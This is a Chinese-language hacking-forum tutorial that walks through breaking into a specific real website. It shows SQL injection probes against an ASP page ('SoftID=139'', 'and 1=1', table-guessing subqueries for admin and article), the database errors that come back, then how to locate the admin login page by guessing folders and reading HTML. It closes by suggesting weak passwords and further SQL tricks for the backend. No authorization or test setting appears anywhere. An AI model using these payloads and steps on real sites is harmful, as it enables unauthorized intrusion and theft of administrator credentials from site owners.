信息来源:黑客基地
文章作者:枫三少
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。
这里我简单的介绍一个过程吧。
首先我找到一个网站,是我们基地首页有连接的
http://www.16china.com/hack/
随便选择一个分页:
http://www.16china.com/hack/SoftView.Asp?SoftID=139
典型的ASP。看看能不能注射
http://www.16china.com/hack/SoftView.Asp?SoftID=139'
返回:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。
/hack/SoftView.Asp,行17
再来:
http://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
返回正常网页。
提交:
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0
返回正常页/
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
同样正常。
http://www.16china.com/hack/Soft ... )%20from%20article)>=0
……
象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
按以往的经验我采用:
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
我为什么不用
http://www.16china.com/hack/admin.asp
http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
http://www.16china.com/hack/admin返回信息:
错误提示信息!
产生错误的可能原因:
您没有进入本页面的权限!本次操作已被记录!
可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.
本页面为[管理员]专用,请先登陆后进入.
返回上一页... /*说明登陆URL为常用的如:index.asp...*/
查看HTML代码:
<html><head><title>错误提示信息!</title>
……
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.
……
找到了:
http://www.16china.com/hack/admin/adminlogin.asp
看看他的源代码告诉我们些什么:
<html>
<head>
<title>管理员登陆</title>
……………
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
http://www.16china.com/hack/admin/adminlogin.asp?action=login
这里。
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:)
